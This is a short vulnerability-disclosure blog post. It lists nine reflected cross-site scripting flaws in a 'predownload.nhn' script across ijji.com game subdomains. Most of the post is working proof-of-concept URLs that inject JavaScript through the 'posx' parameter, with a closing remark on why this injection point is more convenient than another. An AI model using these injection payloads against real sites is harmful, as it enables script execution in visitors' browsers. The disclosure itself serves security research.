Type: Non-persistent
Criteria: None
The penultimate post in this experimental blog, disclosing 9 seperate vulnerabilities in predownload.nhn – a script which only appeared with Huxley.
1) Top-level
http://www.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
2) www2
http://www2.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
3) Huxley:The Dystopia
http://huxley.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
4) Soldier Front
http://sfront.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
5) GunZ
http://gunz.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
6) Drift City
http://drift.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
7) Lunia
http://lunia.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
8) Game
http://game.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
9) Events
http://event.ijji.com/common/predownload.nhn?posx=0;}alert(/xss/.source);function%20init(){return
This script has a greater advantage over prelogin.nhn in that it won’t redirect to login or alert if the plugin is installed.
